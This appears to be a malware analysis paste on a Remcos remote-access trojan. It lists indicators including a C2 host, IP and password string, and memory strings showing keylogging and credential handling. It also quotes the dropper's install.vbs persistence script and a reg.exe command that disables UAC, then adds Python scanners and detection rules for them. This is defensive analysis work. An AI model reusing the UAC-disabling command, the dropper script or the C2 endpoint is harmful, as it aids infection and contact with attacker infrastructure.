Neonprimetime

2018-04-02 @SevenLayerJedi #remcos rat

Apr 2nd, 2018
found by Keith Smith @SevenLayerJedi #remcos rat https://twitter.com/SevenLayerJedi/status/980809311042629634
https://pastebin.com/raw/x7DJ9Drj
https://www.hybrid-analysis.com/sample/6050fea1bb63a53a31b0e1ed957427a1d916115c83dffaf2b2d5c25bcc51b146/5ac22fed7ca3e10787046705

The exe ran and spawned a new chrome.exe process, from which it does its bidding: the API calls below show chrome.exe, not the dropper, creating the remcos directory, opening logs.dat and resolving the C2 host.

--------------
files seen
--------------
C:\Users\xxx\AppData\Roaming\remcos\remcos.exe
C:\Users\xxx\AppData\Local\temp\install.vbs
chrome.exe

--------------
network connections
--------------
georgeoffor.ddns.net 213.183.58.61
0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@

--------------
interesting in memory strings
--------------
0x301994 (166): "C:\Windows\System32\WScript.exe" "C:\Users\Win732\AppData\Local\Temp\install.vbs"
0x413658 (11): CloseCamera
0x413664 (10): OpenCamera
0x41385c (23): Uploading file to C&C:
0x413884 (25): Offline Keylogger Started
0x4138b0 (27): { User has been idle for
0x4138cc (12): minutes }
0x4138dc (24): Online Keylogger Started
0x4138f8 (24): Online Keylogger Stopped
0x413914 (25): Offline Keylogger Stopped
0x413c00 (38): [Chrome StoredLogins found, cleared!]
0x413d0c (32): [Firefox StoredLogins cleared!]
0x414210 (24): \install.vbs
0x4142f0 (28): \uninstall.vbs
0x414398 (22): \update.vbs
0x41444c (24): \restart.vbs
0x4146c4 (27): C:\Windows\System32\cmd.exe
0x4146e0 (129): /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
0x4148b4 (17): Connected to C&C!
0x4148c8 (34): Initializing connection to C&C...
0x414d74 (27): * Breaking-Security.Net
0x414d90 (11): * REMCOS v
0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@
0x817039 (11): Screenshots
0x817579 (23): Software\Remcos-SCLZ2Y\
0x817aa2 (94): C:\Users\xxx\AppData\Roaming\remcos\logs.dat
  49.  
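Added example, not part of the original paste and not Remcos code: a Python scanner that pulls the indicators from the network connections and in-memory strings sections above out of a memory dump or unpacked binary, and parses the C2 string into host, port and password. It assumes the C2 string is laid out as host:port:password followed by a '|' and further fields, generalised from the single string seen here (an assumption), and flags the reg.exe EnableLUA=0 command and the per-build Software\Remcos-<ID>\ key. The sample dump it runs on is constructed inline from the strings above.

```python
"""Scan a memory dump or unpacked binary for the Remcos indicators listed in this note."""
import re

# Indicator strings copied from the in-memory strings section above.
REMCOS_STRINGS = [
    b"Offline Keylogger Started",
    b"Online Keylogger Started",
    b"Uploading file to C&C:",
    b"[Chrome StoredLogins found, cleared!]",
    b"[Firefox StoredLogins cleared!]",
    b"* Breaking-Security.Net",
    b"* REMCOS v",
    b"Connected to C&C!",
    b"Initializing connection to C&C...",
]

# ASSUMPTION: the C2 string is host:port:password followed by '|' and further
# fields, generalised from "georgeoffor.ddns.net:1990:pass|@@Host@@5@@".
C2_RE = re.compile(rb"([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+):(\d{1,5}):([^|\x00:]*)\|")

# reg.exe command seen above that sets EnableLUA to 0 (turns off UAC prompts).
UAC_RE = re.compile(
    rb"reg\.exe\s+ADD\s+HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
    rb"\\Policies\\System\s+/v\s+EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0\b",
    re.IGNORECASE,
)

# Per-build registry key "Software\Remcos-<ID>\"; the ID differs between builds.
REGKEY_RE = re.compile(rb"Software\\Remcos-[A-Za-z0-9]+\\")

# Constructed sample dump: the strings above with padding, not a real capture.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"* REMCOS v\x00"
    + b"\x00" * 16
    + b"Offline Keylogger Started\x00"
    + b"/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows"
    + b"\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\x00"
    + b"georgeoffor.ddns.net:1990:pass|@@Host@@5@@\x00"
    + b"Software\\Remcos-SCLZ2Y\\\x00"
)


def find_indicator_strings(blob):
    """Return (offset, string) for every occurrence of a known indicator, sorted by offset."""
    hits = []
    for s in REMCOS_STRINGS:
        start = 0
        while (idx := blob.find(s, start)) != -1:
            hits.append((idx, s.decode()))
            start = idx + 1
    return sorted(hits)


def extract_c2(blob):
    """Parse every host:port:password C2 string in the blob into a dict."""
    found = []
    for m in C2_RE.finditer(blob):
        port = int(m.group(2))
        if not 1 <= port <= 65535:
            continue  # something like "host:99999:x|" is not a usable endpoint
        found.append({
            "offset": m.start(),
            "host": m.group(1).decode(),
            "port": port,
            "password": m.group(3).decode(errors="replace"),
        })
    return found


def scan(blob):
    """Summarise all indicators; 'remcos' is True only when a C2 line and
    at least two distinct family strings are both present."""
    strings = find_indicator_strings(blob)
    c2 = extract_c2(blob)
    return {
        "indicator_strings": strings,
        "c2": c2,
        "registry_keys": sorted({m.group(0).decode() for m in REGKEY_RE.finditer(blob)}),
        "uac_disable_offsets": [m.start() for m in UAC_RE.finditer(blob)],
        "remcos": bool(c2) and len({s for _, s in strings}) >= 2,
    }


if __name__ == "__main__":
    import json
    import sys
    # Pass a dump file as the first argument, otherwise the constructed sample is scanned.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    print(json.dumps(scan(blob), indent=2))
```

The verdict deliberately requires both a parsed C2 line and more than one family string, so a benign binary that happens to contain a single "Screenshots" or "OpenCamera" string is not flagged on its own.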
--------------
interesting api calls seen
--------------
chrome.exe CreateDirectoryW ( "C:\Users\xxx\AppData\Roaming\remcos", NULL ) FALSE
chrome.exe CreateFileW ( "C:\Users\xxx\AppData\Roaming\remcos\logs.dat", GENERIC_READ, FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL )
chrome.exe gethostbyname ( "georgeoffor.ddns.net" ) 0x00386da8 0.0003958

--------------
interesting file found: install.vbs
--------------
' one-second delay before touching the dropper
WScript.Sleep 1000
Set fso = CreateObject("Scripting.FileSystemObject")
' delete the original dropper from the Desktop
fso.DeleteFile "C:\Users\xxx\Desktop\bad.exe"
' start the persisted copy through cmd /c; window style 0 keeps it hidden
CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\xxx\AppData\Roaming\remcos\remcos.exe""", 0
' self-delete the script
fso.DeleteFile(Wscript.ScriptFullName)
--------------
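Added example, not from the original paste: Python detection logic for the execution chain the API calls and install.vbs above describe (WScript.exe running a .vbs from %Temp%, cmd /c launching an exe from AppData\Roaming, reg.exe setting EnableLUA to 0, a chrome.exe spawned by an unexpected parent, and a DNS query for the C2 host), run over constructed Sysmon-style events. The pid/ppid values, the assumed parent of the spawned chrome.exe, the ".ddns.net" dynamic-DNS suffix and the allowlist of expected chrome.exe parents are assumptions, not sandbox output.

```python
"""Flag the Remcos execution chain from this note in process-creation and DNS events."""
import ntpath
import re

C2_HOSTS = {"georgeoffor.ddns.net"}              # from the network connections section
DYNDNS_SUFFIXES = (".ddns.net",)                 # ASSUMPTION: dynamic-DNS suffix treated as suspicious
CHROME_PARENTS = {"explorer.exe", "chrome.exe"}  # ASSUMPTION: parents a real chrome.exe is expected to have

UAC_RE = re.compile(r"EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0\b", re.I)
ROAMING_EXE_RE = re.compile(r'\\AppData\\Roaming\\[^"\s]*\.exe', re.I)
TEMP_VBS_RE = re.compile(r'\\AppData\\Local\\Temp\\[^"\s]*\.vbs', re.I)

# Constructed Sysmon-style events mirroring the chain above; pid/ppid values and
# the parent of the spawned chrome.exe are assumptions, not sandbox output.
_EXPL = r"C:\Windows\explorer.exe"
_BAD = r"C:\Users\xxx\Desktop\bad.exe"
_WS = r"C:\Windows\System32\WScript.exe"
_CMD = r"C:\Windows\System32\cmd.exe"
_RAT = r"C:\Users\xxx\AppData\Roaming\remcos\remcos.exe"
_CHROME = r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 10, "image": _BAD, "parent_image": _EXPL, "cmdline": _BAD},
    {"type": "process", "pid": 101, "ppid": 100, "image": _WS, "parent_image": _BAD,
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\xxx\AppData\Local\Temp\install.vbs"'},
    {"type": "process", "pid": 102, "ppid": 101, "image": _CMD, "parent_image": _WS,
     "cmdline": r'cmd /c "C:\Users\xxx\AppData\Roaming\remcos\remcos.exe"'},
    {"type": "process", "pid": 103, "ppid": 102, "image": _RAT, "parent_image": _CMD, "cmdline": _RAT},
    {"type": "process", "pid": 104, "ppid": 103, "image": _CMD, "parent_image": _RAT,
     "cmdline": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft"
                r"\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"type": "process", "pid": 105, "ppid": 103, "image": _CHROME, "parent_image": _RAT, "cmdline": "chrome.exe"},
    {"type": "dns", "pid": 105, "query": "georgeoffor.ddns.net"},
    # benign browser start and lookup, to show the rules stay quiet on normal activity
    {"type": "process", "pid": 200, "ppid": 10, "image": _CHROME, "parent_image": _EXPL, "cmdline": _CHROME},
    {"type": "dns", "pid": 200, "query": "www.google.com"},
]


def basename(path):
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def match_rules(ev):
    """Return the names of every rule a single event matches."""
    hits = []
    if ev["type"] == "process":
        img = basename(ev["image"])
        parent = basename(ev.get("parent_image", ""))
        cmd = ev["cmdline"]
        if img in ("wscript.exe", "cscript.exe") and TEMP_VBS_RE.search(cmd):
            hits.append("script_host_runs_vbs_from_temp")
        if img == "cmd.exe" and ROAMING_EXE_RE.search(cmd):
            hits.append("cmd_launches_exe_from_appdata_roaming")
        if UAC_RE.search(cmd):
            hits.append("uac_disabled_via_enablelua")
        if img == "chrome.exe" and parent not in CHROME_PARENTS:
            hits.append("chrome_spawned_by_unexpected_parent")
    elif ev["type"] == "dns":
        query = ev["query"].lower()
        if query in C2_HOSTS:
            hits.append("dns_query_known_c2")
        elif query.endswith(DYNDNS_SUFFIXES):
            hits.append("dns_query_dynamic_dns")
    return hits


def detect(events):
    """Return {pid: [rule, ...]} for every process that matched at least one rule."""
    findings = {}
    for ev in events:
        for rule in match_rules(ev):
            findings.setdefault(ev["pid"], []).append(rule)
    return findings


def process_chain(events, pid):
    """Walk ppid links from pid to the root we have events for; image names root-first."""
    by_pid = {ev["pid"]: ev for ev in events if ev["type"] == "process"}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for pid, rules in detect(SAMPLE_EVENTS).items():
        print(pid, " -> ".join(process_chain(SAMPLE_EVENTS, pid)), rules)
```

Each rule fires on one step of the chain, so an analyst triaging a single hit can call process_chain on the pid to see the dropper, WScript.exe, cmd.exe and remcos.exe ancestry that the paste's file and API-call sections describe.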